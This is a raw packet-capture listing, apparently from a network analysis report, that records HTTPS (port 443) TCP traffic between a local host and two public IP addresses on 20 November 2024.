                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.480611086 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.480731010 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.480740070 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.506386995 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.506953001 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.506968975 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.507451057 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.507457972 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.519306898 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.519861937 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.519885063 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.520477057 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.520488977 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.533632040 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.561661959 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.563049078 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.563066959 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.563560963 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.563568115 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.588771105 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.589353085 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.589370012 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.589975119 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.589981079 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.593986034 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.594423056 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.594435930 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.594846964 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.594860077 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.612768888 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.612839937 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.612920046 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.613172054 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.613189936 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.613203049 CET49804443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.613209009 CET4434980413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.616233110 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.616269112 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.616352081 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.616614103 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.616627932 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626440048 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626458883 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626522064 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626532078 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626668930 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626712084 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626712084 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626733065 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626751900 CET49803443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.626755953 CET4434980313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.629566908 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.629594088 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.629654884 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.629771948 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.629784107 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.663846970 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.664695978 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.669867039 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.670260906 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.670260906 CET49805443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.670279980 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.670290947 CET4434980513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.682642937 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.682677984 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.682759047 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.682995081 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.683008909 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690259933 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690284014 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690416098 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690421104 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690538883 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690723896 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690723896 CET49807443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690746069 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.690754890 CET4434980713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.693856001 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.693877935 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.693973064 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.694120884 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.694142103 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700526953 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700561047 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700623035 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700648069 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700809956 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700839996 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.700861931 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.701021910 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.701061964 CET4434980613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.701117039 CET49806443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.703282118 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.703308105 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.703402996 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.703641891 CET49812443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.703653097 CET4434981213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747061014 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747208118 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747292995 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747339010 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747370005 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747423887 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747457027 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747613907 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747665882 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.747688055 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.751987934 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.752079964 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.752099991 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.759233952 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.759356022 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.759375095 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.765688896 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.765835047 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.765851974 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.815532923 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.833888054 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.834798098 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.834872961 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.834877968 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.834906101 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.835016966 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.841254950 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.847493887 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.847523928 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.847582102 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.847626925 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.847685099 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.853892088 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.860032082 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.860230923 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.860264063 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.866285086 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.866360903 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.866384983 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.873709917 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.873811007 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.873825073 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.873853922 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.873908043 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.878360987 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.884259939 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.884357929 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.884376049 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.884397984 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.884457111 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.890029907 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.895972013 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.896060944 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.896073103 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.896096945 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.896164894 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.901793003 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.922765017 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.922857046 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.922943115 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.923008919 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.923041105 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.923113108 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.927309990 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.927403927 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.927416086 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.927443027 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.927498102 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.932555914 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938235998 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938312054 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938330889 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938421011 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938478947 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.938493967 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.943706989 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.943799973 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.943816900 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.949620008 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.949678898 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.949693918 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.955621004 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.955692053 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.955708027 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.959757090 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.959839106 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.959856033 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.965472937 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.965548038 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.965565920 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.971421003 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.971504927 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.971523046 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.975456953 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.975554943 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.975570917 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.979732990 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.979794025 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.979810953 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.984308004 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.984369993 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.984385967 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.988637924 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.988725901 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.988745928 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.993032932 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.993100882 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.993132114 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.996931076 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.996989965 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.997005939 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.000669956 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.000727892 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.000758886 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.005644083 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.005702972 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.005717993 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.008496046 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.008568048 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.008583069 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.012192965 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.012276888 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.012291908 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.016333103 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.016412020 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.016460896 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.018573999 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.018686056 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.018706083 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021163940 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021224022 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021249056 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021260977 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021306038 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021313906 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021344900 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021387100 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021486998 CET49802443192.168.2.6142.250.186.46
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.021509886 CET44349802142.250.186.46192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.258949995 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.259826899 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.259841919 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.260405064 CET49808443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.260411024 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.307152033 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.307725906 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.307739019 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.308316946 CET49809443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.308321953 CET4434980913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.322191000 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.322799921 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.322815895 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.323618889 CET49810443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.323626041 CET4434981013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.327708960 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.328133106 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.328149080 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.328751087 CET49811443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.328756094 CET4434981113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361032963 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361057997 CET4434980813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:27.361150980 CET49808443192.168.2.613.107.246.45
